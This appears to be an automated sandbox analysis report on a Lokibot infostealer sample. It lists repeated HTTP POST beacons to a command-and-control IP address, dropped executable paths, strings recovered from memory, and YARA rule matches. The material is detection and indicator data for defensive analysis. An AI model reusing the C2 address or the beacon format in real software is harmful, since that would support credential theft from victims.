Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_00404ED4 recv,

12_2_00404ED4

Source: unknown

HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close

Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, gunzipped.exe, 00000007.00000002.3213971046.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/1748937
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/comments/feed/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/feed/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/wp-json/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, WiHDtnb.exe, 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WiHDtnb.exe, WiHDtnb.exe, 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

.NET source code contains very large array initializations

Source: gunzipped.exe, ArffAttribute.cs	Large array initialization: : array initializer size 467652
Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, .cs	Large array initialization: : array initializer size 13798
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, .cs	Large array initialization: : array initializer size 13798
Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, .cs	Large array initialization: : array initializer size 13798

Detected potential crypto function

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0251E030	0_2_0251E030
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052FC748	0_2_052FC748
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F4598	0_2_052F4598
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F4E08	0_2_052F4E08
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F6EE0	0_2_052F6EE0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F49C0	0_2_052F49C0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F49D0	0_2_052F49D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F5230	0_2_052F5230
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F5240	0_2_052F5240
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0131E030	9_2_0131E030
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0632B860	9_2_0632B860
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06324E08	9_2_06324E08
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06326EE0	9_2_06326EE0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063217F0	9_2_063217F0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0632456A	9_2_0632456A
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06324598	9_2_06324598
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06325230	9_2_06325230
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06325240	9_2_06325240
